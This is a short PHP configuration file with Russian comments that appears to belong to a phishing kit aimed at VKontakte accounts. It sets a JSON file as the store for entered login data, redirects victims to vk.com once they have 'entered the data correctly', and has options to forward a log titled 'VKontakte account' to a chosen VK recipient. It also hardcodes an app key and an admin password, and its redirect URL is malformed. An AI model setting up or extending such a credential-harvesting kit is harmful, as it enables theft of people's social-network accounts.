<?
	$password = "admin"; // Пароль от БД
	
	$apiId = "2274003"; // ID приложения [валидация]
	$apiKey = "hHbZxrka2uZ6jB1inYsH"; // Ключ приложения [валидация]
	
	$base = "base.json"; // Название файла Базы Данных (обязательно с расширением .json!)
	$redirect = "https//:vk.com"; // Ссылка, по которой слать юзера, если он верно ввёл данные
	
	$sendVK = 0; // Отправлять ли лог в ВК (1 - отправлять, 0 - не отправлять)
	
	/* Отправка лога в ВК */
	$tokenVK = ""; // Токен пользователя, от имени которого будет отправлено сообщение (получить токен - get_token.php)
	$toVK = ""; // ID получателя
	$titleVK = urlencode("Аккаунт ВКонтакте"); // Тема сообщения
?>